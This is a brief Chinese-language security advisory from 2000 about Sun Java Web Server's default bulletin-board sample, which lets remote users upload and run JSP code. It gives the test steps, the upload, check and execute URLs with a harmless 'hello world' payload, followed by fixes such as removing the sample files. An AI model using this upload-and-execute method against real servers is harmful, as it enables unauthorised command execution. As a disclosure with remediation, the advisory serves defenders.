漏洞发布时间:2000-7-13 17:41:00
漏 洞 描 述:
在solaris and windows nt的sun java web server默认安装设置下。通过公告版的样板程序的漏洞,可以远程执行任意命令。
漏洞测试方法如下:
下面的例子将显示如何上载和执行该代码,而在服务器上显示"hello world"。
输入下面的jsp代码将打印出"hello world":
<% string s="hello world"; %>
<%=s %>
通过下面的公告版连接post这段代码:
http://jws.site/examples/applications/bboard/bboard_frames.html
检验是否该代码真正的上载了:
http://jws.site/board.html
通过执行下面的连接编译和执行该代码:
http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.jspservlet/board.html
解 决 方 法:
仔细按照java web server手册中的"how to secure a web site that uses the java web server" 一章进行设置,或者参考下面连接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者简单的移除默认安装的这些样板文件。
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
